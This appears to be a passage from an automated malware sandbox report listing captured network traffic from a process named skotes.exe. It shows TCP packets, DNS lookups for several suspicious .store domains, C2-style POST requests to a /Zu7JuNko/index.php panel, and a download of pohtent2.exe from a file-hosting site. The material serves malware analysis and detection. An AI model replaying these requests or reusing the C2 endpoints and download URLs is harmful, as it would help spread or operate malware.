Nov 7, 2024 07:33:32.555572033 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555584908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555592060 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555603027 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555646896 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555674076 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555691957 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555694103 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555705070 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555710077 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555744886 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555748940 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555748940 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555756092 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555779934 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555800915 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555824995 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555843115 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555849075 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555883884 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.555908918 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555919886 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.555931091 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556021929 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.556027889 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556040049 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556085110 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.556242943 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556261063 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556271076 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556323051 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.556323051 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.556628942 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556688070 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556699038 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556710958 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.556751013 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556762934 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556771994 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.556775093 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.556792974 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.556838036 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635310888 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635329962 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635335922 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635359049 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635368109 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635411978 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635421038 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635437965 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635437965 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635572910 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635639906 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635648966 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635658979 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635699987 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635699987 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635751963 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635761976 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635771036 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635778904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635790110 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635852098 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635889053 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635962009 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635970116 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635973930 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.635993958 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.635998964 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636022091 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636027098 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636035919 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636050940 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636077881 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636102915 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636132002 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636142015 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636154890 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636188030 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636188030 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636188984 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636229038 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636238098 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636261940 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636279106 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636290073 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636301041 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636385918 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636395931 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636404991 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636409044 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636423111 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636435032 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636446953 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636456966 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636497974 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636514902 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636526108 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636570930 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636576891 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636576891 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636584044 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.636615038 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.636620045 CET	80	49934	185.215.113.16	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2024 07:33:07.563796043 CET	192.168.2.4	1.1.1.1	0xcd72	Standard query (0)	tmpfiles.org	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.173357964 CET	192.168.2.4	1.1.1.1	0x23cb	Standard query (0)	trashycontinuousbubbly.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.173734903 CET	192.168.2.4	1.1.1.1	0x83dd	Standard query (0)	trashycontinuousbubbly.com	65	IN (0x0001)	false
Nov 7, 2024 07:33:18.341306925 CET	192.168.2.4	1.1.1.1	0x357b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:18.341507912 CET	192.168.2.4	1.1.1.1	0x8bf9	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 7, 2024 07:33:42.639061928 CET	192.168.2.4	1.1.1.1	0xe0f1	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:42.785684109 CET	192.168.2.4	1.1.1.1	0xee23	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:43.358424902 CET	192.168.2.4	1.1.1.1	0x1059	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:43.843931913 CET	192.168.2.4	1.1.1.1	0x9056	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:44.279480934 CET	192.168.2.4	1.1.1.1	0x47f8	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:44.324094057 CET	192.168.2.4	1.1.1.1	0x4e6e	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:59.740263939 CET	192.168.2.4	1.1.1.1	0x8dd5	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:00.224653959 CET	192.168.2.4	1.1.1.1	0xfe40	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:00.601712942 CET	192.168.2.4	1.1.1.1	0xcde0	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:02.313927889 CET	192.168.2.4	1.1.1.1	0x4b7e	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:03.236490011 CET	192.168.2.4	1.1.1.1	0xcc8b	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.272147894 CET	192.168.2.4	1.1.1.1	0x6662	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.298451900 CET	192.168.2.4	1.1.1.1	0xb644	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.326961994 CET	192.168.2.4	1.1.1.1	0xd139	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.465996027 CET	192.168.2.4	1.1.1.1	0x6d44	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.696945906 CET	192.168.2.4	1.1.1.1	0xbf52	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2024 07:33:07.570910931 CET	1.1.1.1	192.168.2.4	0xcd72	No error (0)	tmpfiles.org		172.67.195.247	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:07.570910931 CET	1.1.1.1	192.168.2.4	0xcd72	No error (0)	tmpfiles.org		104.21.21.16	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		172.240.127.234	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		172.240.108.76	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		172.240.253.132	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		192.243.59.13	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		192.243.59.12	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		172.240.108.68	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		192.243.61.225	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		192.243.59.20	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		192.243.61.227	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:17.189954042 CET	1.1.1.1	192.168.2.4	0x23cb	No error (0)	trashycontinuousbubbly.com		172.240.108.84	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:18.348032951 CET	1.1.1.1	192.168.2.4	0x357b	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:18.348131895 CET	1.1.1.1	192.168.2.4	0x8bf9	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 7, 2024 07:33:42.660723925 CET	1.1.1.1	192.168.2.4	0xe0f1	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:42.808017015 CET	1.1.1.1	192.168.2.4	0xee23	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:43.383790970 CET	1.1.1.1	192.168.2.4	0x1059	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:44.230567932 CET	1.1.1.1	192.168.2.4	0x9056	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:44.301776886 CET	1.1.1.1	192.168.2.4	0x47f8	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:44.363735914 CET	1.1.1.1	192.168.2.4	0x4e6e	No error (0)	founpiuer.store		172.67.133.135	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:44.363735914 CET	1.1.1.1	192.168.2.4	0x4e6e	No error (0)	founpiuer.store		104.21.5.155	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:33:59.762379885 CET	1.1.1.1	192.168.2.4	0x8dd5	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:00.247016907 CET	1.1.1.1	192.168.2.4	0xfe40	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:00.624221087 CET	1.1.1.1	192.168.2.4	0xcde0	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:02.336194992 CET	1.1.1.1	192.168.2.4	0x4b7e	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:03.259133101 CET	1.1.1.1	192.168.2.4	0xcc8b	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.294115067 CET	1.1.1.1	192.168.2.4	0x6662	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.320770025 CET	1.1.1.1	192.168.2.4	0xb644	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.349080086 CET	1.1.1.1	192.168.2.4	0xd139	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.488024950 CET	1.1.1.1	192.168.2.4	0x6d44	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 07:34:17.719508886 CET	1.1.1.1	192.168.2.4	0xbf52	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49773	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:04.176232100 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 07:33:05.126418114 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49787	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:06.640537977 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 07:33:07.557154894 CET	299	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 30 34 35 33 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 39 38 35 37 30 33 66 64 39 30 31 32 33 35 37 66 35 64 32 31 65 66 35 34 62 34 64 63 64 64 65 38 62 61 61 37 65 37 39 62 32 36 63 31 31 33 31 65 66 31 34 33 65 62 34 34 35 30 34 39 35 62 38 63 38 65 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d <c>1004537001+++b5937c1a99d5f9985703fd9012357f5d21ef54b4dcdde8baa7e79b26c1131ef143eb4450495b8c8eaa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49794	172.67.195.247	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:07.578289032 CET	62	OUT	GET /dl/15309322/pohtent2.exe HTTP/1.1 Host: tmpfiles.org
Nov 7, 2024 07:33:09.345058918 CET	1029	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://tmpfiles.org/dl/15309322/pohtent2.exe Cache-Control: max-age=14400 CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rgf96vDwWG4HkjBHnOqbW70wMUOVsr%2F%2FWCdUSFROo36l%2Fv%2B%2FiRsVHbCxLRNu%2FvQoUhbMIz09JTKkQAAWgb2%2BCoR5oD9M%2BEK%2FhPu9Z%2B5UwUrup2lQyCj19VYE6FoK8JE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deb4a41bd3f6be3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=62&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0
Nov 7, 2024 07:33:09.345516920 CET	1029	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://tmpfiles.org/dl/15309322/pohtent2.exe Cache-Control: max-age=14400 CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rgf96vDwWG4HkjBHnOqbW70wMUOVsr%2F%2FWCdUSFROo36l%2Fv%2B%2FiRsVHbCxLRNu%2FvQoUhbMIz09JTKkQAAWgb2%2BCoR5oD9M%2BEK%2FhPu9Z%2B5UwUrup2lQyCj19VYE6FoK8JE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deb4a41bd3f6be3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=62&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0
Nov 7, 2024 07:33:09.345544100 CET	1029	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://tmpfiles.org/dl/15309322/pohtent2.exe Cache-Control: max-age=14400 CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rgf96vDwWG4HkjBHnOqbW70wMUOVsr%2F%2FWCdUSFROo36l%2Fv%2B%2FiRsVHbCxLRNu%2FvQoUhbMIz09JTKkQAAWgb2%2BCoR5oD9M%2BEK%2FhPu9Z%2B5UwUrup2lQyCj19VYE6FoK8JE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deb4a41bd3f6be3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=62&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0
Nov 7, 2024 07:33:09.346029997 CET	1029	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://tmpfiles.org/dl/15309322/pohtent2.exe Cache-Control: max-age=14400 CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rgf96vDwWG4HkjBHnOqbW70wMUOVsr%2F%2FWCdUSFROo36l%2Fv%2B%2FiRsVHbCxLRNu%2FvQoUhbMIz09JTKkQAAWgb2%2BCoR5oD9M%2BEK%2FhPu9Z%2B5UwUrup2lQyCj19VYE6FoK8JE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deb4a41bd3f6be3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=62&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 